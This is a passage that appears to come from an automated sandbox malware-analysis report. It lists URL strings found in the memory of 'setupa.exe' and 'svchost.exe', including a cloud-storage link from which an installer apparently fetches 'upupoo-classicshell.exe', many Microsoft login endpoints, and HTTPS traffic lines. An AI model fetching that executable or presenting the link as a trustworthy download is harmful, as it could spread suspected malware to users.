                      Source: setupa.exe, 00000000.00000002.2202299611.000001F5DCB43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kehu8.oss-cn-hongkong.aliyuncs.com/upup.oxT
                      Source: setupa.exe, 00000000.00000003.2158570611.000001F5DCDAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kehu8.oss-cn-hongkong.aliyuncs.com/upupoo-classicshell.exe
                      Source: setupa.exe, 00000000.00000003.2158570611.000001F5DCD7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kehu8.oss-cn-hongkong.aliyuncs.com/upupoo-classicshell.exe:
                      Source: setupa.exe, 00000000.00000003.2158570611.000001F5DCDAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kehu8.oss-cn-hongkong.aliyuncs.com/upupoo-classicshell.exeR
                      Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.ecur
                      Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live
                      Source: svchost.exe, 00000008.00000002.3351923495.000002D754C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                      Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfy.srf
                      Source: svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                      Source: svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                      Source: svchost.exe, 00000008.00000003.2199716927.000002D75456B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                      Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502.liv
                      Source: svchost.exe, 00000008.00000003.2199716927.000002D75456B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                      Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600line
                      Source: svchost.exe, 00000008.00000003.2199716927.000002D75456B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D75452C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                      Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601Up
                      Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                      Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                      Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                      Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                      Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                      Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                      Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                      Source: svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                      Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                      Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srfuthUp
                      Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                      Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfesign
                      Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                      Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                      Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfnect
                      Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                      Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfp
                      Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                      Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                      Source: svchost.exe, 00000008.00000003.2199716927.000002D75456B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                      Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srfttps://lo
                      Source: svchost.exe, 00000008.00000003.2199716927.000002D75456B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D75452C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                      Source: svchost.exe, 00000008.00000002.3346905537.000002D753E81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DrEXEOwtzY8Qck
                      Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srfp
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                      Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600gi
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                      Source: svchost.exe, 00000008.00000003.2199716927.000002D75456B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3351923495.000002D754C49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                      Source: svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfls01
                      Source: svchost.exe, 00000008.00000003.2199332280.000002D75452C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                      Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                      Source: svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                      Source: svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199640134.000002D754557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                      Source: svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                      Source: svchost.exe, 00000008.00000003.2199332280.000002D75452C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199418919.000002D75455A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                      Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                      Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2297410444.000002D754C60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                      Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                      Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfAuth
                      Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                      Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                      Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                      Source: svchost.exe, 00000008.00000003.2199388319.000002D753E4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                      Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srfe
                      Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350283658.000002D754537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                      Source: svchost.exe, 00000008.00000002.3347561390.000002D753EB9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3351923495.000002D754C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                      Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                      Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
                      Source: svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
                      Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                      Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                      Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                      Source: svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                      Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                      Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                      Source: svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                      Source: svchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D75452C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                      Source: setupa.exe, 00000000.00000003.2158393983.000001F5DCDC4000.00000004.00000020.00020000.00000000.sdmp, upupoo-classicshell.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
